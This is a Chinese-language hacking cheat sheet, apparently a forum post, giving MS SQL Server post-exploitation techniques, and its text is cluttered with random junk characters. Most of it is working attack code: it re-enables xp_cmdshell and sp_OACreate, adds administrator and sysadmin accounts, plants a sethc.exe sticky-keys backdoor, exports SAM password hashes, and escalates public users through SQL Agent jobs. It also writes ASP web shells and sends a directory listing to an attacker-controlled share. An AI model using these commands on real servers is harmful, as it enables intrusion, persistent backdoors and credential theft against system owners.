1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
恢复方法:查询分析器连接后,
1 V$ V/ k' d) p; j9 r第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; T) A, D& |8 F X第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 5 _9 |$ [+ N, i: w5 n6 e
然后按F5键命令执行完毕
, I0 u; |3 q' S0 s, \5 t- b0 w6 k3 Q/ p8 p- Z9 d" g
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分析器连接后,
. v: q: W( H! q7 Q第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
* J6 c4 k' Z$ q! y第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 Y9 c, a, [& C! p
然后按F5键命令执行完毕! |; y' u5 |; |1 V
4 m" M/ _2 A" v: X" O2 P: Y
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分析器连接后,
! o7 d5 O' l1 y3 j& a4 a第一步执行:exec sp_dropextendedproc 'xp_cmdshell'5 _( {9 l8 t2 [% c2 D( l9 T+ D
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ' \# x% b0 o% M- [) p' G
然后按F5键命令执行完毕 t1 N7 s1 a& x: o/ y$ F9 c
0 h/ t. s6 K) z4 终极方法.
& h! H9 d* a5 s9 T如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:- q! y( I# q- ?' m) g: T! ]" j
查询分析器连接后,
- G2 [& I' k+ s ?6 ^: R2000servser系统:) b9 b' T8 o9 H# J! U3 n2 N3 }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
' V' q! D, J% l$ @5 K5 ?, @! o- J/ }0 V5 H* H- M! Y$ H/ k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
- B/ ^. A4 t# K: K. ?/ D$ s. j6 {8 D% I' U% y) ~1 ]
xp或2003server系统:" y! w# ?/ M& u& A- c) P5 _# K7 \
4 P- G2 u5 P) M+ f7 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
/ c/ D8 z: \% _( `0 s
5 G' z3 Q5 z# z% @: v& r/ g' [# fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'. G. E7 A1 S4 r2 {. k8 Z
* j3 T$ W6 g% ?! g- ~( \) v. Q% r4 J) j8 w
五个SHIFT) W- a$ [* Y7 B$ G$ P* s6 P- c( Q
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';0 ~/ E' l) }7 T/ S
4 I! V" e- L7 k$ e5 i4 k+ ~
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
3 v6 c! l# W. a5 }2 K8 N: J) y; ]- ^
xp_cmdshell执行命令另一种方法; y) c2 z x9 U5 ^( E
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' " o1 r( t' j2 ~6 Y, W; C
& Q+ _/ q9 d U# ]5 a: @. @- e
判断扩展存储过程是否存在
2 R9 N- }" h1 H- c) s1 w& W" x5 j& h; QSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1表示该扩展存储过程存在
5 | N4 \4 j" ~& {! B# t* z: u8 Q6 d. p( S$ f5 G3 Z4 a% p( Y+ c
1 y6 {" ^1 W2 N5 x上传xplog70.dll恢复xp_cmdshell语句:* w6 v! c& Q- j) @) Y) t
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'6 O2 ^) i: W3 o$ j6 j
: {( k" Y; G7 p, \1 C- _% H4 b& u否则上传xplog7.0.dll
9 w. f+ A8 I% g, IExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
3 W9 W, c" t4 Q
. u% j: N& u+ d: J: T8 P
% G7 |0 H2 Z6 Y/ r8 b5 {. A: }3 C! H) X( P7 K- s7 f1 x3 _) ^, ?
首先开启沙盘模式:
& p* l6 _( A( {6 X) B1 J+ Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
3 M0 Z0 Z# @: b3 A+ B! a; \5 F2 D) w! e
然后利用jet.oledb执行系统命令: t& K7 q$ A0 w& @
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
) } V# m {7 U1 o返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
) a0 T' D* ]: J& k; ~ j1 h) O$ R
2 f5 E' z2 F F4 |7 g+ l e/ E( K& U& w' `' \
2 s7 X7 m$ T) j2 w2 B7 L4 Z
恢复过程sp_addextendedproc 如下:
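create procedure sp_addextendedproc --- 1996/08/30 20:13
-- System procedure that registers an extended stored procedure: it binds the
-- name @functname to the function of that name exported by the DLL @dllname.
-- The registration itself is performed by DBCC ADDEXTENDEDPROC; this wrapper
-- only adds the transaction guard.
--
-- @functname  (owner.)name of the function to register
-- @dllname    name of the DLL that contains the function
--
-- Returns 0 on success. When called with an open transaction
-- (@@trancount > 0) it raises error 15002 and returns 1 without
-- touching the registration.
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
    -- refuse to run inside a caller's transaction
    raiserror(15002,-1,-1,'sp_addextendedproc')
    return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO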
; c9 @* N2 U) l/ ]( P9 E2 `& M7 X1 E% Z* M
! t# o' l$ V% Y7 B! L% v
4 r( ?+ j; u& A* r% T导出管理员密码文件
" m5 J- [# z) N# Psa默认可以读sam键.应该。
! i# B* v7 v0 E9 H2 t' z& o# xreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
7 v' a0 B. j6 `% qnet user administrator test
2 u- m# }4 d% x. ]. C* H用administrator登陆.
! l, o. x8 h( {, J% h7 b+ j用完机器后. Z: Q" {# ~$ ~6 s9 ~4 K
reg import c:\test.reg
4 k' G: Q; |# w根本不用克隆.$ y$ _( s! Q: X! n2 m! K9 N& X: K; D
找到对应的sid. 6 Z1 V9 K% `. k
& \( j" W3 _5 Z+ K' _7 i" [
5 A' V u+ y9 D! P. u
?3 Q$ Z) k8 f E: o1 I恢复所有存储过程/ ~+ n( Z# ^' L3 G
use master ; m1 b# e& r! o6 W& L
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
/ f5 C0 k* O2 M( B7 n* s8 yexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
" K i& |6 c2 D+ B( u+ ]exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
6 s, h6 D* i: G8 i4 X0 B7 {) @exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' . Y0 s" B( d$ a- {+ c4 J3 y
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' ) z3 [' k4 Z. m6 a: Y5 a
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 6 d! I5 H: o! [; Y3 f( \- x
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
7 e% |. Q, Y- f' V/ F4 Nexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 9 ?0 _7 e! C( F
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
& q3 v) k# a7 W ?; t! x" I! Uexec sp_addextendedproc sp_OAMethod,'odsole70.dll' # u; S4 ?% F4 q- p
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
9 r$ s6 m5 s) M% J/ y. m8 \exec sp_addextendedproc sp_OAStop,'odsole70.dll' # G$ q% }) `+ Q2 y* L- O6 V0 ]
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
8 o) o3 H- L1 D( D! u) ? pexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
: O9 A5 f' a! o3 N6 D" u- {: \0 q* cexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' : `; S- w/ ]& @/ J1 q
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' $ i* x6 y, q6 ^5 W$ F% Z- g
exec sp_addextendedproc xp_regread,'xpstar.dll' 7 S$ Z0 y q: P
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' # {/ Q9 f- w0 ` v# ^9 I& o
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
) l; Z8 U' S. texec sp_addextendedproc xp_availablemedia,'xpstar.dll'
7 l' z' ]# U+ U+ r; }" F9 p
I; |: Z* [4 _
9 p( a' s0 z) s$ y, l, P- p+ k建立读文件的存储过程6 `; N) G% ~3 u% e: C/ y& q
-- Reads a server-side text file into a temporary table with BULK INSERT and
-- returns every line of the file as one row (line varchar(8000)).
--
-- @filename  server-side path of the file to read. The value is spliced
--            verbatim into a dynamic SQL string below; it is not passed as a
--            parameter, so a path containing a double quote breaks or alters
--            the generated BULK INSERT statement.
--
-- NOTE(review): BULK INSERT is a privileged operation; confirm which role is
-- required on the target version before relying on this proc's behaviour.
Create proc sp_readTextFile @filename sysname8 N# _2 R2 @' y
as$ Y- C/ q4 S- y
" ~8 G1 |, b9 M$ e
begin : P) v4 l( N2 o7 c6 I8 Z, `
-- suppress "n rows affected" so only the result set comes back
set nocount on
-- one row per input line; lines longer than 8000 characters are not handled here
3 u" A+ n' S' ^+ a2 ~ Create table #tempfile (line varchar(8000))& C4 J/ F6 S5 X* p
-- dynamic SQL built by string concatenation: @filename is not parameterized
exec ('bulk insert #tempfile from "' + @filename + '"')
1 t3 C$ |" Z$ i* M8 L: U select * from #tempfile
+ c% a; O; i* o5 T7 ?. h6 i2 ? drop table #tempfile
; @2 H5 U5 I8 p. yEnd
1 q. c: {* H) A& e" D& _0 C; X2 D$ Q3 S8 ]: l
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
5 b/ P; ^6 F/ O/ C- F" ^查看登录用户: d7 `" Y# e4 ?/ b
Select * from sysxlogins
_, m6 Z' ~; D( @' \% \5 r& f
9 Y: f! n. ]; y3 h* L, I把文件内容读取到表中
]* M% R5 X5 l/ N8 J: NBULK INSERT tmp from "c:\test.txt"; Q; \3 u4 y2 `+ ]
dElete from 表名 清理表里的内容% _% r) F& ~$ D. _3 R8 ~* c
create table b_test(fn nvarchar(4000));建一个表,字段为fn
) ?4 D: i' I& T+ ^9 t e
! z: f% w0 X0 K, F' A: n$ |7 @" }/ P& O7 S3 d3 k8 `. e
加sa用户( i8 G& m/ {, h& _& x
exec master.dbo.sp_addlogin user,pass;
' l# M% @* t0 w7 c# n& uexec master.dbo.sp_addsrvrolemember user,sysadmin. n( v+ W2 b0 l I, G6 u' x" \2 b
M! r2 a) H$ j" b) v. G( c# m
! u; v% R! N" K! K0 J1 r. K1 T读文件代码5 c% V) A1 y: I8 J7 b
declare @o int, @f int, @t int, @ret int+ W7 b9 |" H6 v/ ^$ Q
declare @line varchar(8000)
2 g2 \4 h% T( w4 Y0 u$ N4 W- ~exec sp_oacreate 'scripting.filesystemobject', @o out/ q+ E# ~% t" m
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
: _* r1 _* |( M3 l& ^: F6 T& Qexec @ret = sp_oamethod @f, 'readline', @line out
4 Z2 y- ?4 Z2 H: e- \while( @ret = 0 )
3 I1 J) J2 m: o* E4 fbegin* j9 B# I4 A; f" j( R
print @line, {$ R8 X, j, e$ ` `
exec @ret = sp_oamethod @f, 'readline', @line out, r0 ^- }# k- @: s
end# s( i7 W; P2 z3 _8 S' Q" @
# T D6 i2 p7 X( p
6 F0 g4 R6 [# O$ g! Y写文件代码:
* A1 ]9 N$ Z4 l' hdeclare @o int, @f int, @t int, @ret int
8 Q; ^. j! _- fexec sp_oacreate 'scripting.filesystemobject', @o out
) E) @4 s' m! D/ `, [9 U# l4 ^exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1. x4 i9 a8 {3 s/ U
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
; D5 n* V; I0 d% d% `0 I |/ s: U; H
& C4 _0 P: W0 K8 U添加lake2 shell2 V- _4 t, I: ~3 n6 C9 O E- a
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
0 I2 [- K) l+ Tsp_dropextendedproc xp_lake2, R$ G" U0 M. h& e G
EXEC xp_lake2 'net user'6 h3 P" ]8 g2 o! D! b- @
, n8 i% h. }) K) B( J
2 B; d" F0 O3 _5 _得到硬盘文件信息
, o4 e6 b+ c; J5 I--参数说明:目录名,目录深度,是否显示文件
+ b$ N8 c! w5 q* |execute master..xp_dirtree 'c:' , O% q+ C$ h, B* {! y# Z: x
execute master..xp_dirtree 'c:',1 . i) L9 V. c0 R' o
execute master..xp_dirtree 'c:',1,1 # k7 f( r. a9 `8 r" u% { _" ~
4 u- b" p% I+ x% E' _
* F5 ~5 L7 Y$ v. U+ F- S0 t* C读serv-u配置信息
9 i j. Y' @* gexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'+ H) y9 b3 q9 ]) b
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'+ K" E ^6 K. q- y3 [+ {; A
T9 h( J# v1 {) U! Q2 `通过xp_regwrite写SHIFT后门4 k6 I0 m p m4 Y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--7 N3 C0 U& j5 w+ E- }# G
6 e5 N, u( v8 m3 y, p, D/ S
G4 c3 R0 z. T
4 K/ n, u( P& _$ @2 t6 S- Q找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';$ _" X6 f* O+ C1 R4 q+ g6 m! ?- p
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
) F1 M4 L& v+ J R
0 w/ q" K$ Y5 O' J; U5 cEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
7 R2 V; [7 b% ]+ @4 J5 W( r
3 X1 z, K0 R3 f, G/ v
$ t7 F& e* ?2 f0 n8 q9 n# ~2 E9 m* k( `* o1 `1 k) t
sql server 2005下开启xp_cmdshell的办法* X; f1 y3 p- P
6 x( S0 {- @ X5 ]1 m* oEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; K/ d' c5 d9 `* ~5 r
" ?6 J/ L' K% x1 S6 [SQL2005开启'OPENROWSET'支持的方法:
2 I" w4 A& U; }6 R! F% a7 G( ?" M. D# B0 N- s
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
1 `$ H6 Z. n% U; ?; @8 @4 d5 e U. q3 I4 e- ]; y- y# L( ^
SQL2005开启'sp_oacreate'支持的方法:
( ]6 q$ K% S5 D, \- u) b/ K1 A* l, R3 q7 l9 @- A1 ]. j% f, O$ a0 v
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
' U% U7 w0 Z% O, x; @3 J
2 V% M! E% y4 z# }# e' i
. a% Z! M0 l4 y7 p$ h* b) W6 ]7 _; }4 z( T
% [4 e/ [5 j9 T; Y1 [2 B! s
' {# h; u7 T4 y9 z; _: _4 S/ x
) X9 E7 e' i W! k* W }# N# w, ] z6 ^5 A% A" t" G* \, B7 t
6 n$ G( p, g8 o3 t
. @: y( E0 F5 i! E4 T# N% i
) l: }% M* {$ E3 T% c1 i
: K7 j2 ?, G: z2 W
/ a( V$ j5 o" n8 `1 M5 \- N7 \" Z0 U! k1 A# D5 R) J- B
+ a' E L! n( \- P+ E/ n+ r* u) O. C& a5 W( L
. N, w. _1 o8 l3 r
' H0 D' _/ g% D" T) O4 I! O3 n
7 h4 w! h6 W4 S4 O* l( q' L. j: z1 O' t3 H |& E' w1 |. N
, M' |6 Y) m! D* `7 i
7 P+ F4 ^2 U B$ O2 J" y3 R. [
& ~( j; Y- G0 S2 F
/ D C3 b6 D1 S6 F0 w- S1 S9 _2 }* g# N, m* d3 _! {2 ]5 T. i
以下方面不知道能不能成功暂且留下研究哈:
4 J/ @; } F$ a% r( c" J3 h* P4)8 z3 ^ w3 i& y& k
use msdb; --这儿不要是master哟, `6 t; U6 U7 r) F5 W
exec sp_add_job @job_name= czy82 ;( u6 T2 G: ~% j' i
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
6 M! \9 U6 m- d" r+ Y' nexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ; }8 E/ i6 v7 M( e" p$ t& q
exec sp_start_job @job_name= czy82 ;
% j) Q0 w3 p( q3 y& ?5 S: ` g1 U7 A7 V8 I; H# j" k
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
* [4 [7 q, j% A( ~; w执行tsql语句了.# A! c( B$ x2 S- Z
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名$ P% I) M1 D( i: X
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)" P& v \7 P2 A' F, n
net start SQLSERVERAGENT0 [, [1 k* F. m! z' }
7 r, w% V! G7 J% T! T' T对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
) H7 q" t/ Z2 ?! [& X4 [USE msdb0 V& `8 F* Z$ b" Y7 |
EXEC sp_add_job @job_name = GetSystemOnSQL ,
$ ^1 ?! p7 C8 F6 W+ L: `) R+ ^# F@enabled = 1,
# }& @2 F( U p6 U! A: p@description = This will give a low privileged user access to) a, }: S" Z5 F- H V
xp_cmdshell ,
0 @# D3 W1 N% [' |( c3 a@delete_level = 1; \: y9 ^* V+ [" G/ J( b
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,- }" j+ l x7 |9 J
@step_name = Exec my sql ,
0 T( r' D3 e8 y L, q@subsystem = TSQL ,
3 Z4 H. N& l0 f$ o@command = exec master..xp_execresultset N select exec3 X0 j N4 Y g3 B
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
. B5 a! U) I/ r, T5 lEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
3 Z) S9 K& i5 W2 c: G8 k+ o7 U) w@server_name = 你的SQL的服务器名 1 {' ~# a# d1 a5 v* |
EXEC sp_start_job @job_name = GetSystemOnSQL * ?2 ^% b. O* N/ r% D5 K
! k \8 z% m+ ^9 I! k不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以) Y! k3 |9 c4 h8 C
才让我们可以以public执行xp_cmdshell
: C# ], }5 H% a4 ]/ n# z
/ j1 G, q5 m. y6 p) M; h5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
! F/ ~* j& Z! y' d4 ^4 ]! L. X在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968! J+ Y6 l6 u- N( D
9 n, i* }6 K4 V, G
USE msdb
+ o5 g8 L! }" S, E# pEXEC sp_add_job @job_name = ArbitraryFilecreate ,
9 T o8 O% j# V0 j! B7 G- J% g@enabled = 1,
4 g9 M+ m% l. y& W@description = This will create a file called c:\sqlafc123.txt ,! n; J1 _% ^- n, Z9 j
@delete_level = 1# ]% j; V/ k5 ~
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,/ }9 x4 g0 w$ ?( n& ?6 ?1 a/ e
@step_name = SQLAFC ,3 t3 N. m; _. ^; l* d
@subsystem = TSQL ,- w+ y; k! C6 Q& ] y+ z8 K4 i, R2 H
@command = select hello, this file was created by the SQL Agent. ,
9 n" \+ Q- Z- k b# R' [@output_file_name = c:\sqlafc123.txt
0 L4 X# j& `8 c) @4 k2 VEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,) w, C1 I- W5 u) _, n: O# n! n
@server_name = SERVER_NAME
3 `, a$ o4 U$ n( Z) ~EXEC sp_start_job @job_name = ArbitraryFilecreate
1 l( K9 c L: v5 t# E: Z1 v6 _7 m& C6 ^; o, J# [% w# `: i% P
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
" H( i# T) T# H9 t" @& |1 U2 ` S9 t- ^7 E" `$ }' f" f# e/ f
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19$ D8 x3 S* Q- D4 F
----------------------------------------------
7 _; }1 p/ V8 y2 |7 v5 ahello, this file was created by the SQL Agent.
; F. G5 k) }+ ~2 w5 W' O0 z
6 a" E& ~/ C$ w- [$ }(1 ?????)% { v& I6 F3 @+ q
/ U3 M6 c- O- M% Z1 R0 \所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
5 p) N# @" f% Q" b1 N( z命令的vbs文件到启动目录!( f6 q$ G2 L; P5 a$ z
/ Z5 ]9 h3 s" {0 Q0 v. n6)关于sp_makewebtask(可以写任意内容任意文件名的文件)% S) I% P" }$ L
关于sp_MScopyscriptfile 看下面的例子1 B+ s! d: ?5 ]* c
declare @command varchar(100) ) R7 I2 i( T+ w, V
declare @scripfile varchar(200) # O, T9 E& Z; _6 M- u) X" s
set concat_null_yields_null off
3 m: q& x/ k3 X- \5 m7 Vselect @command= dir c:\ > "\\attackerip\share\dir.txt"
( w' o4 ]- X9 e) U3 l6 V2 kselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
9 S! Y; l: e( P% w$ `$ c5 A Dexec sp_MScopyscriptfile @scripfile ,
: D: i; K" W2 W& d- N+ R. K; t7 z1 E3 G7 c
这两个东东都还在测试试哟/ ^+ @* d. H! e+ x9 h% @! g. u
让MSSQL的public用户得到一个本机的web shell . J7 x+ P" f2 M- l& H5 g6 f
, ^# P* R" A$ h: M1 H
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,8 z1 e0 s$ X" ]/ ^' M
--@query= select <img src=vbscript:msgbox(now())> 3 P9 j, B4 x) L$ v
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
# j0 o* B% \/ N5 X" ^& P/ O6 E@query= select ! x; N. X$ z& h( z: g0 G1 j; I
<%On Error Resume Next # F2 `8 r9 P( J: g) u3 @! T! G
Set oscript = Server.createObject("wscript.SHELL")
' W' c" f' v$ v* b$ F+ @Set oscriptNet = Server.createObject("wscript.NETWORK") ; ^5 Z! S* R4 p+ z9 z( ~8 s
Set oFileSys = Server.createObject("scripting.FileSystemObject") 1 g! `4 E% P- ^& |2 ?
szCMD = Request.Form(".CMD")
# o# r. `1 ^ HIf (szCMD <>"")Then
$ o! W, G0 m5 tszTempFile = "C:\" & oFileSys.GetTempName()
) w8 g& X+ I2 W7 kCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ' a9 ?( p& X2 l( i0 x
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
- x0 l4 Y y" Y8 C: PEnd If %> # U5 O( B8 B& x
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> 2 }, @; _% A, W; T4 R
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 8 \" K* H7 C7 o3 V3 u2 X
</FORM>< RE>
& ]6 \8 t" [% S) t9 u0 s<% If (IsObject(oFile))Then
$ K3 Y, d% k6 d, y; y. BOn Error Resume Next
( O" U2 x( B- p b/ [Response.Write Server.HTMLEncode(oFile.ReadAll)
. n# w! ~* E: O+ F$ ^8 ]oFile.Close
# a; ]7 p- B+ B. eCall oFileSys.deleteFile(szTempFile, True)
3 x& \+ E+ ]) y( U- a7 G* `End If%> * E) D E( A/ ?) s" N V4 b0 f
</BODY></HTML>
8 r4 X; W. d4 H$ g |